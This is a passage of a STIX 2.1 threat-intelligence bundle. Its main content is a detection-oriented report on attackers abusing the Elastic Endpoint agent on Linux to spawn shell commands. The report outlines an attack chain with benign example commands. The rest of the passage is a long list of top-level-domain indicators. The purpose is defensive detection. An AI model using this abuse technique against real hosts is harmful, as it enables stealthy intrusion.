      "relationship_type": "uses",
      "source_ref": "report--f495777f-8d74-5bcb-8061-90c057a52c89",
      "target_ref": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6775165e-cc5d-5c24-bf27-2df3f4d12143",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f495777f-8d74-5bcb-8061-90c057a52c89",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94ed6470-4b44-57ab-8d4d-e93f09f917be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f495777f-8d74-5bcb-8061-90c057a52c89",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f495777f-8d74-5bcb-8061-90c057a52c89",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Shell Execution via Elastic Endpoint on Linux",
      "description": "## Overview\n\nThis threat brief focuses on the detection of malicious shell execution activities initiated by the Elastic Endpoint agent on Linux systems. Attackers gaining control over an Elastic Endpoint agent could leverage its built-in response action console to execute arbitrary shell commands on compromised machines. This technique allows adversaries to establish remote access, execute further commands, or maintain persistence, often bypassing standard detection mechanisms by masquerading as legitimate endpoint management actions. The detection rule targets the spawning of common shell interpreters (such as `bash`, `sh`, `zsh`) as child processes of the `/opt/Elastic/Endpoint/elastic-endpoint` binary, specifically when invoked with command execution arguments like `-c` or `--command`. This behavior is a strong indicator of post-exploitation activity, where an adversary is actively controlling the system through the endpoint agent, making it critical for defenders to identify and respond to promptly.\n\n## Attack Chain\n\nThis detection rule focuses on a post-exploitation phase where an attacker has already gained sufficient access to leverage the Elastic Endpoint agent.\n\n1.  **Initial Compromise (Pre-requisite)**: An attacker gains initial access to a Linux system through various means (e.g., exploitation of a vulnerability, compromised credentials, or malicious payload).\n2.  **Privilege Escalation / Lateral Movement (Pre-requisite)**: The attacker may escalate privileges or move laterally to a system where the Elastic Endpoint agent is running with sufficient permissions.\n3.  **Abuse Elastic Endpoint Functionality**: The attacker interacts with the compromised Elastic Endpoint agent, potentially through its API or an exposed administrative interface, to instruct it to execute commands.\n4.  **Shell Process Creation**: The `elastic-endpoint` process, acting on the attacker's commands, spawns a child process for a shell interpreter (e.g., `bash`, `sh`, `zsh`).\n5.  **Command Execution**: The spawned shell executes arbitrary commands supplied by the attacker (e.g., `-c \"whoami\"`, `-lc \"ls -la /tmp\"`), leading to system reconnaissance, data exfiltration, or further malware deployment.\n6.  **Command and Control / Impact**: The executed commands facilitate command and control, enable persistence, or contribute to the attacker's final objective, such as data exfiltration or system disruption.\n\n## Impact\n\nSuccessful exploitation of this technique provides attackers with a stealthy method to execute arbitrary commands on a compromised Linux host, using a trusted endpoint security agent as a proxy. This can lead to full system compromise, data theft, deployment of additional malware (e.g., ransomware, cryptominers), or establishment of long-term persistence within the environment. Since the activity originates from a legitimate security product's process, it can evade less sophisticated monitoring solutions, making detection crucial. The potential for a wide range of follow-on activities means the impact can range from minor data exposure to complete business disruption.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Shell Execution via Elastic Endpoint\" to your SIEM and tune for your Linux environment.\n*   Ensure that Elastic Defend and Elastic Endpoint are configured for comprehensive logging of process creation events on Linux systems, as specified in the rule's `logsource`.\n*   Review access controls and configurations for the Elastic Endpoint agent and its management interfaces to prevent unauthorized command execution capabilities.\n*   Investigate any alerts triggered by the rule, paying close attention to the `CommandLine` arguments and the context of the `elastic-endpoint` process.\n",
      "published": "2026-07-06T17:29:54Z",
      "labels": [
        "linux",
        "endpoint-security",
        "command-and-control",
        "defense-evasion",
        "execution",
        "detection-rule"
      ],
      "object_refs": [
        "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/command_and_control_elastic_endpoint_shell_execution.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0b21e109-0d73-5028-8339-5d74e4e986ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .forum",
      "pattern": "[domain-name:value = '.forum']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d2387c7-6ae0-5eb7-afd9-645a759004dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--0b21e109-0d73-5028-8339-5d74e4e986ba"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--45d0a6b3-c8fe-5b7b-8ae5-a18017414c24",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .pro",
      "pattern": "[domain-name:value = '.pro']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--774a1f1b-2565-5501-b85d-e06c043ddb99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--45d0a6b3-c8fe-5b7b-8ae5-a18017414c24"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f25f9cc7-c1a4-5377-8cef-acb12b19be45",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .team",
      "pattern": "[domain-name:value = '.team']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f06d063-1fbb-5c2c-8416-b3b84fbf354a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--f25f9cc7-c1a4-5377-8cef-acb12b19be45"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2d04d72a-5d61-5964-9c29-6d5d97d80bfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .lol",
      "pattern": "[domain-name:value = '.lol']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25946f7c-a1e7-549d-ad18-c3bf7e239cd6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--2d04d72a-5d61-5964-9c29-6d5d97d80bfa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ce02435a-7d6c-5ae8-aecc-9c1abd82675d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .kr",
      "pattern": "[domain-name:value = '.kr']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--700a652b-343c-5473-8e55-28c2fe8aa011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--ce02435a-7d6c-5ae8-aecc-9c1abd82675d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e1a92039-d35c-5e69-8c43-1a94652f9be4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .ke",
      "pattern": "[domain-name:value = '.ke']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--af45d005-8625-5bba-a266-607cd476d4c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--e1a92039-d35c-5e69-8c43-1a94652f9be4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e694e3a4-460a-5695-98fa-6281c4ced8d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .nu",
      "pattern": "[domain-name:value = '.nu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9aa11eaa-e713-5706-a292-8bd7f57c5f7e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--e694e3a4-460a-5695-98fa-6281c4ced8d8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--df1de1d3-1b8c-5860-8765-885b24aeddb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .space",
      "pattern": "[domain-name:value = '.space']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de20214c-f251-50e3-9e8b-c53305757bd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--df1de1d3-1b8c-5860-8765-885b24aeddb1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7c90d3e9-d94e-5ad4-8bed-367c175a20c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .capital",
      "pattern": "[domain-name:value = '.capital']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ecc22525-9bf9-5139-ab36-cc7093d6ba72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--7c90d3e9-d94e-5ad4-8bed-367c175a20c3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dc2908ed-565f-5a98-90e9-024945286c49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .in",
      "pattern": "[domain-name:value = '.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae0faa36-54dd-5e3e-abec-e38716413426",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--dc2908ed-565f-5a98-90e9-024945286c49"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--227dcf2b-2ab0-56cb-a84e-27ffde906d33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .cfd",
      "pattern": "[domain-name:value = '.cfd']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--188fe250-8d16-5c43-998d-7ff463363d41",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--227dcf2b-2ab0-56cb-a84e-27ffde906d33"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a446ffb0-fd89-5476-80ad-592339428f66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .online",
      "pattern": "[domain-name:value = '.online']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5cf55c0-4a0e-57a0-87dd-0872d66f7a0f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--a446ffb0-fd89-5476-80ad-592339428f66"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0cb8fd78-7b14-5d6c-ab80-257796ba2e0c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .ru",
      "pattern": "[domain-name:value = '.ru']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--526e65b0-0572-58fa-bf1c-6579d57515f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--0cb8fd78-7b14-5d6c-ab80-257796ba2e0c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a8758301-8778-50e4-91bc-c1f5b10782f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .info",
      "pattern": "[domain-name:value = '.info']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd1828c5-3edb-543d-96d3-09faf854b0d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--a8758301-8778-50e4-91bc-c1f5b10782f3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2ed3d325-5c34-55d6-8afe-10e163a99623",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .top",
      "pattern": "[domain-name:value = '.top']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--13b27a44-f490-5031-ac76-fd686fe6ff53",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--2ed3d325-5c34-55d6-8afe-10e163a99623"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--578bda4f-bbf8-5971-a416-08239b431d30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .buzz",
      "pattern": "[domain-name:value = '.buzz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6cecbf67-5e31-5fa3-b9c6-ceaccc36c034",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--578bda4f-bbf8-5971-a416-08239b431d30"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0134520f-eadb-55f0-9f0a-782f3f1932c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .xyz",
      "pattern": "[domain-name:value = '.xyz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e71e8f9-8904-5e9f-8ca0-d1397ceda057",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--0134520f-eadb-55f0-9f0a-782f3f1932c5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ab1efc31-0997-5095-a4d5-d6f76dfbf197",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .rest",
      "pattern": "[domain-name:value = '.rest']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5320b4f3-68ea-5dd6-a782-8e9e56acf2bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--ab1efc31-0997-5095-a4d5-d6f76dfbf197"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b8543ab5-e0eb-5393-be19-62a6bc7c7a85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .ml",
      "pattern": "[domain-name:value = '.ml']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cdd3f493-e3af-561e-b920-c281567c4f18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--b8543ab5-e0eb-5393-be19-62a6bc7c7a85"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--04d945b7-053b-57ad-bf76-da8125213585",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .cf",
      "pattern": "[domain-name:value = '.cf']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8edad23-82f7-54ab-8c2d-b8407d70cf23",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--04d945b7-053b-57ad-bf76-da8125213585"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9f7053c9-6ba1-5fed-935e-216f6eeea5e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .gq",
      "pattern": "[domain-name:value = '.gq']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da343aa1-0720-5c70-a9c3-52d3ee66d1c1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--9f7053c9-6ba1-5fed-935e-216f6eeea5e8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4d3e1305-1992-5392-a2eb-494f1447c19c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .ga",
      "pattern": "[domain-name:value = '.ga']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd585d14-379c-562f-b676-483d33d36300",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--4d3e1305-1992-5392-a2eb-494f1447c19c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--aed74d9a-beb7-57e2-965b-cf2711c7cfe0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .onion",
      "pattern": "[domain-name:value = '.onion']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d76d5c35-ba7d-5bff-80f4-6537d2d4887a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--aed74d9a-beb7-57e2-965b-cf2711c7cfe0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--132695cb-4832-5e7c-97e4-1f9831a1ca87",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .network",
      "pattern": "[domain-name:value = '.network']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2629ebac-0627-577e-8986-4c46159ca0eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--132695cb-4832-5e7c-97e4-1f9831a1ca87"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--59d51733-8c47-5032-9fcb-f8fb41cb70d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .monster",
      "pattern": "[domain-name:value = '.monster']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fc103e2e-d266-55db-a787-437f9872b5c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--59d51733-8c47-5032-9fcb-f8fb41cb70d5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--50217469-c93b-572c-a523-8defd371e97b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .marketing",
      "pattern": "[domain-name:value = '.marketing']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e72f50a2-4730-5230-8565-db62128e491b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--50217469-c93b-572c-a523-8defd371e97b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b3928a2b-8d5f-51ba-a9eb-1479e107c5c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .cyou",
      "pattern": "[domain-name:value = '.cyou']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a6149cc2-7813-5f1c-8c7e-6e7f56ac8c9b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--b3928a2b-8d5f-51ba-a9eb-1479e107c5c5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c1ca8275-e41b-51f7-a140-b7e2a4ac583a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .quest",
      "pattern": "[domain-name:value = '.quest']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--31fd5c1a-a15a-5001-aee8-89874ec8f606",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--c1ca8275-e41b-51f7-a140-b7e2a4ac583a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--33cec719-a629-56c7-a80c-dcdb370345a9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .cc",
      "pattern": "[domain-name:value = '.cc']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8731f67d-8a90-52ca-80d4-95ba75e58150",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--33cec719-a629-56c7-a80c-dcdb370345a9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f147c2f6-3953-5840-ac1c-b15391477d06",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .bar",
      "pattern": "[domain-name:value = '.bar']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b983889-a4af-5cba-9afb-2754acbbdef9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--f147c2f6-3953-5840-ac1c-b15391477d06"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9c76e86f-271c-5234-8c43-8779f714f640",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .click",
      "pattern": "[domain-name:value = '.click']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9dabdac-c740-53af-b27e-fd826dd8011e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--9c76e86f-271c-5234-8c43-8779f714f640"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2db2a174-5d4f-5195-9621-add3b8e100be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .cam",
      "pattern": "[domain-name:value = '.cam']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42a5da3f-a9b7-5749-9f06-7fb4695b685d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bfd8eead-eacd-5371-9934-2c1890cd03b6",
      "target_ref": "indicator--2db2a174-5d4f-5195-9621-add3b8e100be"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--370d9d28-4878-5066-b3ec-2a54626a0505",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .surf",
      "pattern": "[domain-name:value = '.surf']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:29:03Z"
    },
    {
